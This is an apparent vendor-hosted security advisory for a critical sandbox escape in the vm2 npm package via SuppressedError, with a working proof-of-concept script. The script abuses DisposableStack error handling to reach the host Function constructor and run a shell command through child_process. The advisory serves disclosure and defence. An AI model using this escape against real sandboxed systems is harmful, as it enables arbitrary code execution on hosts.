Launch Week Day 1: Announcing Security Design Review
CRITICAL 9.8 npm

VM2 Has a Sandbox Escape Issue via SuppressedError

GHSA-55hx-c926-fr95 · CVE-2026-26332

Published · Modified

Description

In vm2 v3.10.4 on Node.js v24.13.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code.

PoC

const { VM } = require("vm2");

const vm = new VM();

vm.run(`
const ds = new DisposableStack();
ds.defer(() => { throw null; });
ds.defer(() => {
  const e = Error();
  e.name = Symbol();
  e.stack;
});
try {
  ds.dispose();
} catch(e) {
  const Function = e.suppressed.constructor.constructor;
  const process = new Function("return process;")();
  const { execSync } = process.mainModule.require("node:child_process");
  execSync("echo pwned", { stdio: "inherit" });
}
`);

Ready to move

Start Securing

Free, no credit card | First findings in minutes